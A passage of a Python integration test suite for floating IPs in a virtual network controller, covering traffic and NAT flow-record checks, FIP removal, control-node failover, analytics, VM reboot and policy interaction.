if not fvn1_vm1_fixture.ping_with_certainty(fip_fixture1.fip[fip_id1]):
result = result and False
# fip_fixture1.disassoc_and_delete_fip(fip_id1)
# fip_fixture2.disassoc_and_delete_fip(fip_id2)
if not result:
self.logger.error(
'Test Failed for restart of agent and control node with floating IP')
assert result
return result
# end test_service_restart_with_fip
@preposttest_wrapper
def test_fip_with_traffic(self):
'''Testtraffic accross borrower and giving VN.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_traffic_fixture = self.res.fvn1_vm1_traffic_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_traffic_name = self.res.fvn1_vm1_traffic_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_traffic_fixture = self.res.vn1_vm1_traffic_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_traffic_name = self.res.vn1_vm1_traffic_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_traffic_fixture.verify_on_setup()
assert vn1_vm1_traffic_fixture.verify_on_setup()
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
# Install traffic pkg in VM
vn1_vm1_traffic_fixture.install_pkg("Traffic")
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_traffic_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, vn1_vm1_traffic_fixture, fvn1_fixture)
if not vn1_vm1_traffic_fixture.ping_with_certainty(fvn1_vm1_traffic_fixture.vm_ip):
result = result and False
# Send UDP traffic
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
vn1_vm1_traffic_fixture.install_pkg("Traffic")
# Verify Traffic ---
# Start Traffic
traffic_obj = {}
startStatus = {}
stopStatus = {}
traffic_proto_l = ['udp']
total_streams = {}
total_streams['udp'] = 1
dpi = 9100
proto = 'udp'
for proto in traffic_proto_l:
traffic_obj[proto] = {}
startStatus[proto] = {}
traffic_obj[proto] = self.useFixture(
traffic_tests.trafficTestFixture(self.connections))
# def startTraffic (self, name=name, num_streams= 1, start_port= 9100, tx_vm_fixture= None, rx_vm_fixture= None, stream_proto= 'udp', \
# packet_size= 100, start_sport= 8000,
# total_single_instance_streams= 20):
startStatus[proto] = traffic_obj[proto].startTraffic(
num_streams=total_streams[proto], start_port=dpi,
tx_vm_fixture=vn1_vm1_traffic_fixture, rx_vm_fixture=fvn1_vm1_traffic_fixture, stream_proto=proto)
self.logger.info("Status of start traffic : %s, %s, %s" %
(proto, vn1_vm1_traffic_fixture.vm_ip, startStatus[proto]))
if startStatus[proto]['status'] != True:
result = False
self.logger.info("-" * 80)
# Poll live traffic
traffic_stats = {}
self.logger.info("Poll live traffic and get status..")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic disruption is seen: details: "
#self.assertEqual(traffic_stats['status'], True, err_msg)
assert(traffic_stats['status'] == True), err_msg
self.logger.info("-" * 80)
# Verify Flow records here
inspect_h1 = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
inspect_h2 = self.agent_inspect[fvn1_vm1_traffic_fixture.vm_node_ip]
flow_rec1 = None
udp_src = unicode(8000)
dpi = unicode(dpi)
# Verify Ingress Traffic
self.logger.info('Verifying Ingress Flow Record')
flow_rec1 = inspect_h1.get_vna_fetchflowrecord(vrf=vn1_vm1_traffic_fixture.agent_vrf_objs['vrf_list'][0][
'ucindex'], sip=vn1_vm1_traffic_fixture.vm_ip, dip=fvn1_vm1_traffic_fixture.vm_ip, sport=udp_src, dport=dpi, protocol='17')
if flow_rec1 is not None:
self.logger.info('Verifying NAT in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'nat', 'enabled')
if match is False:
self.logger.error(
'Test Failed. NAT is not enabled in given flow. Flow details %s' % (flow_rec1))
result = result and False
self.logger.info('Verifying traffic direction in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'direction', 'ingress')
if match is False:
self.logger.error(
'Test Failed. Traffic direction is wrong should be ingress. Flow details %s' % (flow_rec1))
result = result and False
else:
self.logger.error(
'Test Failed. Required ingress Traffic flow not found')
result = result and False
# Verify Egress Traffic
# Check VMs are in same agent or not. Need to compute source vrf
# accordingly
if vn1_vm1_traffic_fixture.vm_node_ip != fvn1_vm1_traffic_fixture.vm_node_ip:
source_vrf = vn1_vm1_traffic_fixture.agent_vrf_objs[
'vrf_list'][0]['ucindex']
else:
vrf_list = inspect_h1.get_vna_vrf_objs(
vn_name=fvn1_vm1_traffic_fixture.vn_name)
source_vrf = vrf_list['vrf_list'][0]['ucindex']
self.logger.info('Verifying Egress Flow Records')
flow_rec2 = inspect_h1.get_vna_fetchflowrecord(
vrf=source_vrf, sip=fvn1_vm1_traffic_fixture.vm_ip, dip=fip_fixture1.fip[fip_id1], sport=dpi, dport=udp_src, protocol='17')
if flow_rec2 is not None:
self.logger.info('Verifying NAT in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec2, 'nat', 'enabled')
if match is False:
self.logger.error(
'Test Failed. NAT is not enabled in given flow. Flow details %s' % (flow_rec2))
result = result and False
self.logger.info('Verifying traffic direction in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec2, 'direction', 'egress')
if match is False:
self.logger.error(
'Test Failed. Traffic direction is wrong should be Egress. Flow details %s' % (flow_rec1))
result = result and False
else:
self.logger.error(
'Test Failed. Required Egress Traffic flow not found')
result = result and False
# Stop Traffic
self.logger.info("Proceed to stop traffic..")
self.logger.info("-" * 80)
for proto in traffic_proto_l:
stopStatus[proto] = {}
stopStatus[proto] = traffic_obj[proto].stopTraffic()
#if stopStatus[proto] != []: msg.append(stopStatus[proto]); result= False
if stopStatus[proto] != []:
result = False
self.logger.info("Status of stop traffic for proto %s is %s" %
(proto, stopStatus[proto]))
self.logger.info("-" * 80)
if not result:
self.logger.error(
'Test Failed. Floating IP test with traffic failed')
assert result
return result
# end test_fip_with_traffic
@preposttest_wrapper
def test_removal_of_fip_with_traffic(self):
'''Test the removal of FIP with back ground traffic. Verify the impact on flow also.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_traffic_fixture = self.res.fvn1_vm1_traffic_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_traffic_name = self.res.fvn1_vm1_traffic_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_traffic_fixture = self.res.vn1_vm1_traffic_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_traffic_name = self.res.vn1_vm1_traffic_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_traffic_fixture.verify_on_setup()
assert vn1_vm1_traffic_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_traffic_fixture.vm_id)
assert fip_fixture1.verify_fip(
fip_id1, vn1_vm1_traffic_fixture, fvn1_fixture)
if not vn1_vm1_traffic_fixture.ping_with_certainty(fvn1_vm1_traffic_fixture.vm_ip):
result = result and False
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
# Install traffic pkg in VM
vn1_vm1_traffic_fixture.install_pkg("Traffic")
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
# Verify Traffic ---
# Start Traffic
traffic_obj = {}
startStatus = {}
stopStatus = {}
traffic_proto_l = ['udp']
total_streams = {}
total_streams['udp'] = 1
dpi = 9100
proto = 'udp'
for proto in traffic_proto_l:
traffic_obj[proto] = {}
startStatus[proto] = {}
traffic_obj[proto] = self.useFixture(
traffic_tests.trafficTestFixture(self.connections))
# def startTraffic (self, name=name, num_streams= 1, start_port= 9100, tx_vm_fixture= None, rx_vm_fixture= None, stream_proto= 'udp', \
# packet_size= 100, start_sport= 8000,
# total_single_instance_streams= 20):
startStatus[proto] = traffic_obj[proto].startTraffic(
num_streams=total_streams[proto], start_port=dpi,
tx_vm_fixture=vn1_vm1_traffic_fixture, rx_vm_fixture=fvn1_vm1_traffic_fixture, stream_proto=proto)
self.logger.info("Status of start traffic : %s, %s, %s" %
(proto, vn1_vm1_traffic_fixture.vm_ip, startStatus[proto]))
#if startStatus[proto] != None: msg.append(startStatus[proto]); result= False
if startStatus[proto]['status'] != True:
result = False
self.logger.info("-" * 80)
# Poll live traffic
traffic_stats = {}
self.logger.info("Poll live traffic and get status..")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic disruption is seen: details: "
#self.assertEqual(traffic_stats['status'], True, err_msg)
assert(traffic_stats['status'] == True), err_msg
self.logger.info("-" * 80)
self.logger.info(
"Removing/disassociating FIP here. Now Traffic should stopped")
fip_fixture1.disassoc_and_delete_fip(fip_id1)
sleep(2)
# Poll live traffic
traffic_stats = {}
self.logger.info(
"Traffic expected to stop flowing as FIP removed.Disruption expected.")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic NOT stopped after FIP removal "
#self.assertEqual(traffic_stats['status'], False, err_msg)
assert(traffic_stats['status'] == False), err_msg
self.logger.info("-" * 80)
# Verify Flow records here
inspect_h1 = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
inspect_h2 = self.agent_inspect[fvn1_vm1_traffic_fixture.vm_node_ip]
flow_rec1 = None
udp_src = unicode(8000)
dpi = unicode(dpi)
# Verify Ingress Traffic
self.logger.info('Verifying Ingress Flow Record')
flow_rec1 = inspect_h1.get_vna_fetchflowrecord(vrf=vn1_vm1_traffic_fixture.agent_vrf_objs['vrf_list'][0][
'ucindex'], sip=vn1_vm1_traffic_fixture.vm_ip, dip=fvn1_vm1_traffic_fixture.vm_ip, sport=udp_src, dport=dpi, protocol='17')
if flow_rec1 is not None:
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'short_flow', 'yes')
if match is False:
self.logger.error(
'Test Failed. After removal of FIP flow type should be short_flow. Flow details %s' % (flow_rec1))
result = result and False
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'dst_vn', '__UNKNOWN__')
if match is False:
self.logger.error(
'Test Failed. After removal of FIP destination VN should be unkwown. Flow details %s' % (flow_rec1))
result = result and False
# Verify Egress Traffic
self.logger.info('Verifying Egress Flow Records')
# Check VMs are in same agent or not. Need to compute source vrf
# accordingly
if vn1_vm1_traffic_fixture.vm_node_ip != fvn1_vm1_traffic_fixture.vm_node_ip:
source_vrf = vn1_vm1_traffic_fixture.agent_vrf_objs[
'vrf_list'][0]['ucindex']
else:
vrf_list = inspect_h1.get_vna_vrf_objs(
vn_name=fvn1_vm1_traffic_fixture.vn_name)
source_vrf = vrf_list['vrf_list'][0]['ucindex']
flow_rec2 = inspect_h1.get_vna_fetchflowrecord(
vrf=source_vrf, sip=fvn1_vm1_traffic_fixture.vm_ip, dip=fip_fixture1.fip[fip_id1], sport=dpi, dport=udp_src, protocol='17')
if flow_rec2 is not None:
self.logger.error(
'Test Failed. Egress Flow records entry should be removed after removal of FIP. It still exists.')
self.logger.error('Flow record entry: %s' % (flow_rec2))
result = result and False
else:
self.logger.info(
'Verification successful. Egress flow records removed')
flow_rec3 = inspect_h1.get_vna_fetchflowrecord(
vrf=source_vrf, sip=fvn1_vm1_traffic_fixture.vm_ip, dip=vn1_vm1_traffic_fixture.vm_ip, sport=dpi, dport=udp_src, protocol='17')
if flow_rec3 is not None:
match = inspect_h1.match_item_in_flowrecord(
flow_rec3, 'short_flow', 'yes')
if match is False:
self.logger.error(
'Test Failed. After removal of FIP flow type should be short_flow. Flow details %s' % (flow_rec3))
result = result and False
match = inspect_h1.match_item_in_flowrecord(
flow_rec3, 'dst_vn', '__UNKNOWN__')
if match is False:
self.logger.error(
'Test Failed. After removal of FIP destination VN should be unkwown. Flow details %s' % (flow_rec3))
result = result and False
# Stop Traffic
self.logger.info("Proceed to stop traffic..")
self.logger.info("-" * 80)
for proto in traffic_proto_l:
stopStatus[proto] = {}
stopStatus[proto] = traffic_obj[proto].stopTraffic()
self.logger.info("-" * 80)
if not result:
self.logger.error(
'Test Failed. Traffic not stopped/flow still exists after FIP removal')
assert result
return result
# end test_removal_of_fip_with_traffic
@preposttest_wrapper
def test_traffic_with_control_node_switchover(self):
''' Stop the control node and check peering with agent fallback to other control node.
'''
if len(set(self.inputs.bgp_ips)) < 2:
raise self.skipTest(
"Skiping Test. At least 2 control node required to run the test")
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_traffic_fixture = self.res.fvn1_vm1_traffic_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_traffic_name = self.res.fvn1_vm1_traffic_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_traffic_fixture = self.res.vn1_vm1_traffic_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_traffic_name = self.res.vn1_vm1_traffic_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_traffic_fixture.verify_on_setup()
assert vn1_vm1_traffic_fixture.verify_on_setup()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_traffic_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(
fip_id1, vn1_vm1_traffic_fixture, fvn1_fixture)
if not vn1_vm1_traffic_fixture.ping_with_certainty(fvn1_vm1_traffic_fixture.vm_ip):
result = result and False
# Figuring the active control node
active_controller = None
inspect_h = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
agent_xmpp_status = inspect_h.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
active_controller = entry['controller_ip']
self.logger.info('Active control node from the Agent %s is %s' %
(vn1_vm1_traffic_fixture.vm_node_ip, active_controller))
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
# Install traffic pkg in VM
vn1_vm1_traffic_fixture.install_pkg("Traffic")
fvn1_vm1_traffic_fixture.install_pkg("Traffic")
# Start Traffic
traffic_obj = {}
startStatus = {}
stopStatus = {}
traffic_proto_l = ['icmp']
total_streams = {}
total_streams[
'icmp'] = 1
dpi = 9100
proto = 'icmp'
for proto in traffic_proto_l:
traffic_obj[proto] = {}
startStatus[proto] = {}
traffic_obj[proto] = self.useFixture(
traffic_tests.trafficTestFixture(self.connections))
startStatus[proto] = traffic_obj[proto].startTraffic(
num_streams=total_streams[proto], start_port=dpi,
tx_vm_fixture=vn1_vm1_traffic_fixture, rx_vm_fixture=fvn1_vm1_traffic_fixture, stream_proto=proto)
self.logger.info("Status of start traffic : %s, %s, %s" %
(proto, vn1_vm1_traffic_fixture.vm_ip, startStatus[proto]))
if startStatus[proto]['status'] != True:
result = False
self.logger.info("-" * 80)
# Poll live traffic
traffic_stats = {}
self.logger.info("Poll live traffic and get status..")
for proto in traffic_proto_l:
traffic_stats = traffic_obj[proto].getLiveTrafficStats()
err_msg = "Traffic disruption is seen: details: "
#self.assertEqual(traffic_stats['status'], True, err_msg)
assert(traffic_stats['status'] == True), err_msg
self.logger.info("-" * 80)
# Stop on Active node
self.logger.info('Stoping the Control service in %s' %
(active_controller))
self.inputs.stop_service('contrail-control', [active_controller])
sleep(5)
# Check the control node shifted to other control node
new_active_controller = None
new_active_controller_state = None
inspect_h = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
agent_xmpp_status = inspect_h.get_vna_xmpp_connection_status()
for entry in agent_xmpp_status:
if entry['cfg_controller'] == 'Yes':
new_active_controller = entry['controller_ip']
new_active_controller_state = entry['state']
self.logger.info('Active control node from the Agent %s is %s' %
(vn1_vm1_traffic_fixture.vm_node_ip, new_active_controller))
if new_active_controller == active_controller:
self.logger.error(
'Control node switchover fail. Old Active controlnode was %s and new active control node is %s' %
(active_controller, new_active_controller))
result = False
if new_active_controller_state != 'Established':
self.logger.error(
'Agent does not have Established XMPP connection with Active control node')
result = result and False
# Verify Flow records here
inspect_h1 = self.agent_inspect[vn1_vm1_traffic_fixture.vm_node_ip]
inspect_h2 = self.agent_inspect[fvn1_vm1_traffic_fixture.vm_node_ip]
flow_rec1 = None
udp_src = unicode(8000)
dpi = unicode(dpi)
# Verify Ingress Traffic
self.logger.info('Verifying Ingress Flow Record')
flow_rec1 = inspect_h1.get_vna_fetchflowrecord(vrf=vn1_vm1_traffic_fixture.agent_vrf_objs['vrf_list'][0][
'ucindex'], sip=vn1_vm1_traffic_fixture.vm_ip, dip=fvn1_vm1_traffic_fixture.vm_ip, sport='0', dport='0', protocol='1')
if flow_rec1 is not None:
self.logger.info('Verifying NAT in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'nat', 'enabled')
if match is False:
self.logger.error(
'Test Failed. NAT is not enabled in given flow. Flow details %s' % (flow_rec1))
result = result and False
self.logger.info('Verifying traffic direction in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec1, 'direction', 'ingress')
if match is False:
self.logger.error(
'Test Failed. Traffic direction is wrong should be ingress. Flow details %s' % (flow_rec1))
result = result and False
else:
self.logger.error(
'Test Failed. Required ingress Traffic flow not found')
result = result and False
# Verify Egress Traffic
# Check VMs are in same agent or not. Need to compute source vrf
# accordingly
if vn1_vm1_traffic_fixture.vm_node_ip != fvn1_vm1_traffic_fixture.vm_node_ip:
source_vrf = vn1_vm1_traffic_fixture.agent_vrf_objs[
'vrf_list'][0]['ucindex']
else:
vrf_list = inspect_h1.get_vna_vrf_objs(
vn_name=fvn1_vm1_traffic_fixture.vn_name)
source_vrf = vrf_list['vrf_list'][0]['ucindex']
self.logger.info('Verifying Egress Flow Records')
flow_rec2 = inspect_h1.get_vna_fetchflowrecord(
vrf=source_vrf, sip=fvn1_vm1_traffic_fixture.vm_ip, dip=fip_fixture1.fip[fip_id1], sport='0', dport='0', protocol='1')
if flow_rec2 is not None:
self.logger.info('Verifying NAT in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec2, 'nat', 'enabled')
if match is False:
self.logger.error(
'Test Failed. NAT is not enabled in given flow. Flow details %s' % (flow_rec2))
result = result and False
self.logger.info('Verifying traffic direction in flow records')
match = inspect_h1.match_item_in_flowrecord(
flow_rec2, 'direction', 'egress')
if match is False:
self.logger.error(
'Test Failed. Traffic direction is wrong should be Egress. Flow details %s' % (flow_rec1))
result = result and False
else:
self.logger.error(
'Test Failed. Required Egress Traffic flow not found')
result = result and False
# Stop Traffic
self.logger.info("Proceed to stop traffic..")
self.logger.info("-" * 80)
for proto in traffic_proto_l:
stopStatus[proto] = {}
stopStatus[proto] = traffic_obj[proto].stopTraffic()
#if stopStatus[proto] != []: msg.append(stopStatus[proto]); result= False
if stopStatus[proto] != []:
result = False
self.logger.info("Status of stop traffic for proto %s is %s" %
(proto, stopStatus[proto]))
self.logger.info("-" * 80)
# Start the control node service again
self.logger.info('Starting the Control service in %s' %
(active_controller))
self.inputs.start_service('contrail-control', [active_controller])
sleep(10)
# Check the BGP peering status from the currently active control node
self.logger.info(
'Checking the BGP peering from new active controler %s' %
(new_active_controller))
cn_bgp_entry = self.cn_inspect[
new_active_controller].get_cn_bgp_neigh_entry()
sleep(5)
for entry in cn_bgp_entry:
if entry['state'] != 'Established':
result = result and False
self.logger.error(
'With Peer %s peering is not Established. Current State %s ' %
(entry['peer'], entry['state']))
# fip_fixture1.disassoc_and_delete_fip(fip_id1)
if not result:
self.logger.error('Switchover of control node failed')
assert result
return True
# end test_traffic_with_control_node_switchover
@preposttest_wrapper
def test_fip_in_uve(self):
'''Test analytics information for FIP
'''
result = True
fip_pool_name = 'some-pool1'
fvn_fixture = self.res.fvn1_fixture
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
fvn_subnets = self.res.fvn1_subnets
vm1_name = self.res.vn1_vm1_name
vn1_name = self.res.vn1_name
vn1_subnets = self.res.vn1_subnets
assert fvn_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
fip_fixture = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name, vn_id=fvn_fixture.vn_id))
assert fip_fixture.verify_on_setup()
fip_id = fip_fixture.create_and_assoc_fip(
fvn_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture.disassoc_and_delete_fip, fip_id)
assert fip_fixture.verify_fip(fip_id, vn1_vm1_fixture, fvn_fixture)
# Verify FIP details in analytics UVE
self.logger.info("Verifying FIP details in UVE")
result = fip_fixture.verify_fip_in_uve(
fip_fixture.fip[fip_id], vn1_vm1_fixture, fvn_fixture)
# fip_fixture.disassoc_and_delete_fip(fip_id)
if not result:
self.logger.error('FIP verification in UVE has failed')
assert result
return True
# end test_fip_in_uve
@preposttest_wrapper
def test_vm_restart_with_fip(self):
'''Test restart of VM with Floating IP.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_vm1_name = self.res.fvn1_vm1_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_fixture.vm_id)
self.addCleanup(fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn1_fixture)
if not vn1_vm1_fixture.ping_with_certainty(fvn1_vm1_fixture.vm_ip):
result = result and False
# Restart the VM here
self.logger.info('Rebooting the VM %s' % (vn1_vm1_name))
cmd_to_reboot_vm = ['reboot']
vn1_vm1_fixture.run_cmd_on_vm(cmds=cmd_to_reboot_vm)
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
assert vn1_vm1_fixture.verify_on_setup()
self.logger.info('Verify the connectivity to other VN via floating IP')
if not vn1_vm1_fixture.ping_with_certainty(fvn1_vm1_fixture.vm_ip):
result = result and False
if not result:
self.logger.error('Test VM restart with FIP failed')
assert result
return True
# end test_vm_restart_with_fip
@preposttest_wrapper
def test_vn_info_in_agent_with_fip(self):
'''Test VN information available in in agent when FIP allocated.
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_name = self.res.fvn1_name
fvn1_vm1_name = self.res.fvn1_vm1_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
assert fvn1_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
fvn1_vm1_traffic_fixture.wait_till_vm_is_up()
vn1_vm1_traffic_fixture.wait_till_vm_is_up()
fip_fixture1 = self.useFixture(
FloatingIPFixture(
project_name=self.inputs.project_name, inputs=self.inputs,
connections=self.connections, pool_name=fip_pool_name1, vn_id=fvn1_fixture.vn_id))
assert fip_fixture1.verify_on_setup()
# Checking the allocating VN info in borrower VM agent.
self.logger.info(
'Checking the VN informatiopn of FIP allocating VN is already present in agent of borrower VN or not')
inspect_h1 = self.agent_inspect[vn1_vm1_fixture.vm_node_ip]
vn_fq_name = inspect_h1.get_vna_vn(vn_name=fvn1_name)
if vn_fq_name is None:
self.logger.info('VN info for %s is not present in agent %s' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
else:
self.logger.error(
'VN info for %s is already present in agent %s. Setup problem. Existing the test here' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
result = result & False
assert result
# Allocate the FIP here
fip_id1 = fip_fixture1.create_and_assoc_fip(
fvn1_fixture.vn_id, vn1_vm1_fixture.vm_id)
#self.addCleanup( fip_fixture1.disassoc_and_delete_fip, fip_id1)
assert fip_fixture1.verify_fip(fip_id1, vn1_vm1_fixture, fvn1_fixture)
if not vn1_vm1_fixture.ping_with_certainty(fvn1_vm1_fixture.vm_ip):
result = result and False
# Checking the allocating VN info in borrower VM agent.
vn_fq_name = inspect_h1.get_vna_vn(vn_name=fvn1_name)
if vn_fq_name is None:
self.logger.info(
'FIP allocating VN %s is not present in agent %s' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
result = result & False
fip_fixture1.disassoc_and_delete_fip(fip_id1)
assert result
else:
self.logger.info('VN info for %s is present in agent %s.' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
# Disasscotite the fixture here
self.logger.info('Dis associating the FIP %s from VM %s' %
(fip_fixture1.fip[fip_id1], vn1_vm1_name))
fip_fixture1.disassoc_and_delete_fip(fip_id1)
vn_fq_name = inspect_h1.get_vna_vn(vn_name=fvn1_name)
if vn_fq_name is None:
self.logger.info('VN info for %s is no more present in agent %s' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
else:
self.logger.error(
'VN info for %s is still present in agent %s after removal of FIP' %
(fvn1_name, vn1_vm1_fixture.vm_node_ip))
result = result & False
if not result:
self.logger.error('Test VN info in agent with FIP failed')
assert result
return True
# end test_vn_info_in_agent_with_fip
@preposttest_wrapper
def test_fip_with_policy(self):
'''Test interation of FIP with policy .
'''
result = True
fip_pool_name1 = 'some-pool1'
fvn1_fixture = self.res.fvn1_fixture
fvn1_vm1_fixture = self.res.fvn1_vm1_fixture
fvn1_subnets = self.res.fvn1_subnets
fvn1_name = self.res.fvn1_name
fvn1_vm1_name = self.res.fvn1_vm1_name
fvn2_fixture = self.res.fvn2_fixture
fvn2_vm1_fixture = self.res.fvn2_vm1_fixture
fvn2_subnets = self.res.fvn2_subnets
fvn2_name = self.res.fvn2_name
fvn2_vm1_name = self.res.fvn2_vm1_name
vn1_fixture = self.res.vn1_fixture
vn1_vm1_fixture = self.res.vn1_vm1_fixture
vn1_subnets = self.res.vn1_subnets
vn1_vm1_name = self.res.vn1_vm1_name
vn2_fixture = self.res.vn2_fixture
vn2_vm1_fixture = self.res.vn2_vm1_fixture
vn2_subnets = self.res.vn2_subnets
vn2_vm1_name = self.res.vn2_vm1_name
assert fvn1_fixture.verify_on_setup()
assert fvn2_fixture.verify_on_setup()
assert vn1_fixture.verify_on_setup()
assert vn2_fixture.verify_on_setup()
assert fvn1_vm1_fixture.verify_on_setup()
assert fvn2_vm1_fixture.verify_on_setup()
assert vn1_vm1_fixture.verify_on_setup()
assert vn2_vm1_fixture.verify_on_setup()
# Apply policy in between VN
policy1_name = 'policy1'
policy2_name = 'policy2'
rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
'source_network': fvn1_name,
'dest_network': fvn2_name,
},
]
rev_rules = [
{
'direction': '<>', 'simple_action': 'pass',
'protocol': 'icmp',
'source_network': fvn2_name,
'dest_network': fvn1_name,
},
]
# Policy
policy1_fixture = self.useFixture(PolicyFixture(
policy_name=policy1_name, rules_list=rules, inputs=self.inputs, connections=self.connections))
policy2_fixture = self.useFixture(PolicyFixture(
policy_name=policy2_name, rules_list=rev_rules, inputs=self.inputs, connections=self.connections))
self.logger.info('Apply policy between VN %s and %s' %
(fvn1_name, fvn2_name))
fvn1_fixture.bind_policies(
[policy1_fixture.policy_fq_name], fvn1_fixture.vn_id)
self.addCleanup(fvn1_fixture.unbind_policies,
fvn1_fixture.vn_id, [policy1_fixture.policy_fq_name])
fvn2_fixture.bind_policies(
[policy2_fixture.policy_fq_name], fvn2_fixture.vn_id)
self.addCleanup(fvn2_fixture.unbind_policies,
fvn2_fixture.vn_id, [policy2_fixture.policy_fq_name])
self.logger.info('Ping from %s to %s' % (fvn1_vm1_name, fvn2_vm1_name))
if not fvn1_vm1_fixture.ping_with_certainty(fvn2_vm1_fixture.vm_ip):
result = result and False
# FIP
self.logger.info("Configuring floating IP now")
fip_fixture1 = self.useFixture(
FloatingIPFixture(
